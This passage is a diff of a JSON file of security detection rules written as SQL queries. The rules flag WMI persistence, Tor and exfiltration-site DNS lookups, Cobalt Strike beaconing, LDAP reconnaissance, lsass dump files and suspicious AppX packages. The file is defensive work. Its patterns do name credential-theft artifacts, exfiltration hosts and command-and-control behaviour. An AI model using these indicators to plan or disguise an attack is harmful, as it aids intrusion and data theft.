"description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1068" + "attack.t1546.003" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown (data set is too small; further testing needed)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_wmi_persistence.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "status": "test", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", - "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", - "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Suspicious File Drop by Exchange", - "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", + "id": "31d68132-4038-47c7-8f8e-635a39a7c174", + "status": "test", + "description": "Detects potential Active Directory enumeration via LDAP", + "author": "Adeem Mawani", "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" - ], - "falsepositives": [ - "Unknown" + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" ], - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" + "filename": "win_ldap_recon.yml" }, { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Deployment Of The AppX Package Was Blocked By The Policy", + "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "status": "experimental", + "description": "Detects an appx package deployment that was blocked by the local computer policy", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_appxdeployment_server_policy_block.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "Deployment AppX Package Was Blocked By AppLocker", + "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "description": "Detects an appx package deployment that was blocked by AppLocker policy", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_appxdeployment_server_applocker_block.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" - ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" - }, - { - "title": "New Shim Database Created in the Default Directory", - "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "status": "test", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", - "author": "frack113", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_new_shim_database.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", - "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "title": "Uncommon AppX Package Locations", + "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_appxdeployment_server_uncommon_package_locations.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "Suspicious AppX Package Installation Attempt", + "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate AppX packages not signed by MS used part of an enterprise" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Malicious AppX Package Installation Attempts", + "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", + "status": "experimental", + "description": "Detects potential installation or installation attempts of known malicious appx packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_mal_appx_names.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": 